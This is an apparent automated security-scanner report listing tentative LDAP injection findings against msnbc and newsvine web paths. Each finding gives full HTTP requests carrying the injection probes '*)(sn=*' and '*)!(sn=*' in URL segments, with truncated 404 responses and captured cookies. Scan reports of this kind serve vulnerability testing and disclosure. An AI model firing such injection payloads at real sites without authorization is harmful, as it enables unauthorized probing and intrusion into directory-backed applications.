Date: Sun, 30 Jan 2011 01:25:05 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40123

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1418737154&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1418737154&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a><
...[SNIP]...

Request 2

GET /_static/feeds/*)!(sn=* HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350377678

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:25:06 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40105

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=285889559&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=285889559&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></l
...[SNIP]...

2.21. http://www.msnbc.redacted/id/32359544/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/32359544/

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads 1f4e07eeaa6b77c9)(sn=* and 1f4e07eeaa6b77c9)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /1f4e07eeaa6b77c9)(sn=*/32359544/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Cnection: close
Content-Length: 1245
Date: Sun, 30 Jan 2011 03:10:32 GMT
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

Request 2

GET /1f4e07eeaa6b77c9)!(sn=*/32359544/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:10:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 99408

<html xmlns:tvservices="http://www.msnbc.com"><head><title>Page not found - About- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21589549" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21731378" /><script type="text/javascript" src="/js/std.js"></script><script type="text/javascript" src="/id/23149822"></script><script type="text/javascript">gEnabled=false;</script><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta http-equiv="pics-label" content="(pics-1.1 &quot;http://www.icra.org/ratingsv02.html&quot; l gen true for &quot;http://www.msnbc.redacted&quot; r (nz 1vz 1lz 1oz 1cz 1) &quot;http://www.rsac.org/ratingsv01.html&quot; l gen true for &quot;http://www.msnbc.redacted&quot; r (l 0n 0s 0v 0))"><meta name="robots" content="noindex"><meta name="description" content="Error 404"><meta name="Search.Document" content="story"><meta name="Search.Title" content="We cannot find the page you requested."><meta name="Search.Updated" content="Thu, 11 Mar 2010 22:11:14 GMT"><meta name="Search.Expires" content="Fri, 31 Dec 9999 23:59:59 GMT"><meta name="GOOGLEBOT" content="unavailable_after: 31-Dec-9999 23:59:59 GMT"><meta name="Search.Section" content="About"><link rel="alternate" type="application/rss+xml" title="MSNBC - Top msnbc.com headlines" href="http://www.msnbc.redacted/id/3032091/device/rss/rss.xml" xmlns:media="http://search.yahoo.com/mrss/" /><link rel="alternate" type="application/rss+xml" title="MSNBC - Top Stories" href="http://rss.msnbc.redacted/id/3032091/device/rss/rss.xml"><script language="javascript" type="text/javascript">
this.nm_bo = function (o)
{
//newsmenu delay
if (nm_Enter)
{
window.clearTimeout(nm_Enter);
nm_Enter = 0;
}
// Get initiating button
if (o)
{
o2 = o.relatedTarget;
o = o.target;
}
else
{
o = window.event.srcElement;
o2 = window.ev
...[SNIP]...

2.22. http://www.polls.newsvine.com/_nv/cms/help/faq [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/help/faq

Issue detail

The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /_nv/cms/*)(sn=*/faq HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:19:12 GMT
Content-Length: 15040
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=2078587454&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=2078587454&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.co
...[SNIP]...

Request 2

GET /_nv/cms/*)!(sn=*/faq HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:19:12 GMT
Content-Length: 15050
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=974779505&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=974779505&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/
...[SNIP]...

2.23. http://www.polls.newsvine.com/_nv/cms/info/copyrightPolicy [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/copyrightPolicy

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/cms/info/copyrightPolicy HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:23:02 GMT
Content-Length: 15041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=898516139&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=898516139&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/
...[SNIP]...

Request 2

GET /*)!(sn=*/cms/info/copyrightPolicy HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:23:03 GMT
Content-Length: 15051
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=1554333003&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=1554333003&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.co
...[SNIP]...

2.24. http://www.polls.newsvine.com/_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.polls.newsvine.com
Path:   /_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:20 GMT
Content-Length: 15042
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=513229026&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=513229026&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/
...[SNIP]...

Request 2

GET /*)!(sn=*/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:20 GMT
Content-Length: 15052
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=1977279021&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=1977279021&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
